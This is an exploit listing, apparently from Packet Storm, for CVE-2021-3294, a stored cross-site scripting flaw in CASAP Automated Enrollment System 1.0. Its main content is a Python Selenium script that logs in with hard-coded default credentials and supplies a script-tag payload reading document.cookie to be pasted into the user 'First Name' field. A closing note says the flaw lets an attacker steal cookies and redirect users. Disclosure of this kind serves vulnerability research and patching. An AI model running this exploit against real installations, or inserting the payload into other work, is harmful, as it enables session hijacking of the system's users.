Exploit for CASAP Automated Enrollment System 1.0 Cross Site Scripting CVE-2021-3294

Name: Exploit for CASAP Automated Enrollment System 1.0 Cross Site Scripting CVE-2021-3294
Rating: 5 (257 reviews)
2021-02-16 | CVSS 3.5
## https://sploitus.com/exploit?id=PACKETSTORM:161421
# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS  
# Author: nu11secur1ty  
# Date: 02.15.2021  
# Vendor: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html  
# Software Athor: https://www.sourcecodester.com/users/yna-ecole  
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3294/CASAP.zip  
# Link Original: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code  
# CVE: CVE-2021-3294  
  
  
[+] Credits: (@ nu11secur1ty)  
[+] Website: https://www.nu11secur1ty.com/  
[+] Source:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294  
  
[Exploit Program Code]  
#!/usr/bin/python3  
# author @nu11secur1ty  
# For CVE-2021-3294  
  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
import time  
import os  
  
  
#enter the link to the website you want to automate login.  
website_link="http://localhost/Final/index.php"  
  
#enter your login username  
username="yna.ecole"  
  
#enter your login password  
password="12345"  
  
  
#enter the element for username input field  
element_for_username="username"  
#enter the element for password input field  
element_for_password="password"  
#enter the element for submit button  
element_for_submit="login"  
  
  
#browser = webdriver.Safari() #for macOS users[for others use chrome vis  
chromedriver]  
browser = webdriver.Chrome() #uncomment this line,for chrome users  
#browser = webdriver.Firefox() #uncomment this line,for chrome users  
  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
exploit="nu11<script>alert(document.cookie)</script>"  
print("If everything is ok, please paste this in to the Users in section in  
First Name\n")  
print(exploit)  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
[Vendor]  
https://www.sourcecodester.com/users/yna-ecole  
  
  
[Vulnerability Type]  
XSS  
  
[CVE Reference]  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294  
  
[Security Issue]  
CASAP Automated Enrollment System 1.0 is affected by cross-site scripting  
(XSS) in users.php.  
An attacker can steal a cookie to perform user redirection to a malicious  
website.  
  
  
[Video]  
https://www.youtube.com/watch?v=_nhIZyJ8rxM  
  
  
@nu11secur1ty  
https://www.nu11secur1ty.com/